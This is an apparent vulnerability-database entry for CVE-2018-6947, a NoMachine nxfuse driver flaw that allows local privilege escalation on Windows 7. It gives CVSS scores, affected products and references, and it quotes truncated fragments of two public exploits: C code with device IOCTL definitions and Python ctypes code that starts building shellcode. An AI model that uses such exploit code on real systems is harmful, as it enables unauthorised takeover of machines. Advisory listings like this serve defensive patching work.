Published: 28/02/2018 Updated: 03/10/2019

CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9

CVSS v3 Base Score: 7.8 | Impact Score: 5.9 | Exploitability Score: 1.8

VMScore: 730

Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

An uninitialised stack variable in the nxfuse component that is part of the Open Source DokanFS library shipped with NoMachine 6.0.66_2 and previous versions allows a local low privileged user to gain elevation of privileges on Windows 7 (32 and 64bit), and denial of service for Windows 8 and 10.

Vulnerable Product	Search on Vulmon	Subscribe to Product
nomachine nomachine
microsoft windows 10
microsoft windows 8
microsoft windows 7

#include “stdafxh” #include <Windowsh> #define DEVICE L”\\\\\\nxfs-709fd562-36b5-48c6-9952-302da6218061″ #define DEVICE2 L”\\\\\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}” #define IOCTL 0x00222014 #define IOCTL2 0x00222030 #define OUT_SIZE 0x90 #define IN_SIZE 0x10 #defin ...

from ctypes import * from ctypeswintypes import * import struct import sys import os MEM_COMMIT = 0x00001000 MEM_RESERVE = 0x00002000 PAGE_EXECUTE_READWRITE = 0x00000040 GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 OPEN_EXISTING = 0x3 STATUS_INVALID_HANDLE = 0xC0000008 shellcode_len = 90 s = “” s += “\x65\x48\x8B ...

CWE-665 https://www.nomachine.com/TR02P08408 https://www.nomachine.com/SU02P00195 https://www.nomachine.com/SU02P00194 https://www.fidusinfosec.com/nomachine-road-code-execution-without-fuzzing-cve-2018-6947/https://www.exploit-db.com/exploits/44168/https://www.exploit-db.com/exploits/44167/https://nvd.nist.gov https://www.exploit-db.com/exploits/44167/

CVE-2018-6947

Vulnerability Summary

Vulnerability Trend

Exploits

References

Vulmon Search

About

Products

Connect